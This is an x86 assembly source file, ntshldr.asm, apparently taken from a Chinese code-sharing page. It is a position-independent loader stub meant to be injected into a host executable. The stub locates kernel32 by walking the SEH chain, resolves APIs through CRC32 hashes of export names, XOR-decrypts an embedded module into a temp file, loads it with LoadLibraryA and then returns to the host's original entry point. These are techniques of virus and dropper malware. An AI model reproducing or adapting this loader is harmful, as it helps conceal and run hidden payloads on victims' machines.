📄 ntshldr.asm
字号:
.486p
.model flat, stdcall
option casemap :none
;--------------------------------------------------------
CRC16 MACRO string
CRC_VALUE = 0ffffffffh
IRPC CRC_BYTE, string
CRC_VALUE = CRC_VALUE xor '&CRC_BYTE'
REPT 8
CRC_VALUE = (CRC_VALUE shr 1) xor ((CRC_VALUE and 1) * 0edb88320h)
ENDM
ENDM
CRC_VALUE = CRC_VALUE xor 0ffffffffh
dd (CRC_VALUE and 0ffffffffh)
ENDM
APIDEF MACRO sym
CRC16 sym
sym = [ebp + COUNT]
COUNT = COUNT + 4
ENDM
VARDEF MACRO sym, vw
sym = COUNT
COUNT = COUNT + vw
ENDM
;--------------------------------------------------------
.CODE
;****************************************************************************
; ???
;****************************************************************************
_MiniLoaderStart:
push 12345678h
HostEntryPoint = $ - 4
call SubEnter
mov eax, esp
xchg esi, eax
lodsd
cmp eax, -1
jne $ - 5 ;查找SEH链尾
mov edx, [esi]
SearchKernel32:
dec edx
xor dx, dx
cmp word ptr [edx], 'ZM'
jne SearchKernel32
mov ecx, [edx + 3ch]
cmp dword ptr [edx + ecx], 'EP'
jne SearchKernel32 ;查找KERNEL32基地址
call $ + 5
pop eax
sub eax, $ - vdelta - 1 ;全局重定位
enter 80h, 0
mov [ebp + var_delta], eax
lea esi, [eax + KNLAPILIST - vdelta]
mov edi, esp
call GetApiAddressFromList ;查找需要的API地址
mov edi, 260
sub esp, edi
push esp ;lpBuffer
push edi ;nBufferLength
call GetTempPathA
mov eax, esp
sub esp, edi
push esp ;lpTempFileName
push 0 ;wUnique
call $ + 8 ;lpPrefixString
db "SH", 0
push eax ;lpszPath
call GetTempFileNameA ;获取临时文件名
mov eax, esp
push ebx ;NULL
push ebx ;0
push 2 ;CREATE_ALWAYS
push ebx ;NULL
push 0 ;0
push 40000000h ;GENERIC_WRITE
push eax ;lpFileName
call CreateFileA
mov [ebp + var_hFile], eax
inc eax
jz HostReturn ;创建文件失败?
sub esi, KNLAPILIST - ModuleEntry
lodsd ;读取模块长度
xchg ebx, eax
sub esp, 1000h
mov edi, esp
LoopDecryptModule:
mov ecx, 1000h
cmp ebx, ecx
jnb $ + 4
mov ecx, ebx
push ecx
push edi
lodsb
xor al, 3ch ;解密模块文件
stosb
loop $ - 4
pop edi
pop ecx
sub ebx, ecx
push esp ;临时变量
mov eax, esp
push 0 ;lpOverlapped
push eax ;lpNumberOfBytesWritten
push ecx ;nNumberOfBytesToWrite
push edi ;lpBuffer
push dword ptr [ebp + var_hFile] ;hFile
call WriteFile
pop eax ;平衡堆栈
test ebx, ebx
jnz LoopDecryptModule
add esp, 1000h
push dword ptr [ebp + var_hFile] ;hFile
call CloseHandle
push esp ;lpLibFileName
call LoadLibraryA ;载入解密后的模块
HostReturn:
leave
jmp SubLeave ;跳回宿主入口
;****************************************************************************
; ???
;****************************************************************************
SubEnter:
pushad
xor ebx, ebx
call InstallSEH
pop eax ;异常处理
pop eax
pop esp
SubLeave:
xor ebx, ebx
pop dword ptr fs:[ebx]
pop eax
popad
add esp, 4
ret
InstallSEH:
push dword ptr fs:[ebx]
mov fs:[ebx], esp
jmp [esp + 28h] ;调用SubEnter时的返回地址
;****************************************************************************
; ???
;****************************************************************************
GetApiAddressFromList:
pushad
mov ecx, [edx + 3ch]
add ecx, edx
mov ebx, [ecx + 78h] ;ExporyTableAddress
add ebx, edx
or ebp, -1 ;计数寄存器
SearchNextAPI:
mov ecx, [ebx + 20h] ;AddressOfNames
add ecx, edx
ContinueSearch:
inc ebp
mov eax, edx
add eax, [ecx + ebp * 4] ;取API名称字符串
pushad
or edx, -1
@1:
mov ch, [eax]
inc eax
xor dl, ch
mov cl, 8
@2:
shr edx, 1
jnc @3
xor edx, 0edb88320h
@3:
dec cl
jnz @2
test ch, ch
jnz @1
not edx
cmp [esi], edx
popad
jne ContinueSearch
mov eax, [ebx + 24h] ;AddressOfNameOrdinals
add eax, edx
movzx eax, word ptr [eax + ebp * 2]
mov ecx, [ebx + 1ch] ;AddressOfFunctions
add ecx, edx
mov eax, [ecx + eax * 4]
add eax, edx
stosd ;保存API地址
lodsd
cmp dword ptr [esi], 0 ;API名的CRC16列表以四个0结束
jne SearchNextAPI
popad
ret
;********************************************************
vdelta:
;********************************************************
COUNT = -80h
KNLAPICALL = COUNT
KNLAPILIST:
APIDEF CloseHandle
APIDEF CreateFileA
APIDEF GetTempFileNameA
APIDEF GetTempPathA
APIDEF LoadLibraryA
APIDEF WriteFile
dd 00h ;ENDLIST
VARDEF var_delta, 4
VARDEF var_hFile, 4
;--------------------------------------------------------
_MiniLoaderCodeEnd:
ModuleEntry:
dd 00000001h
db 00h
;--------------------------------------------------------
start:
jmp _MiniLoaderStart
end start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -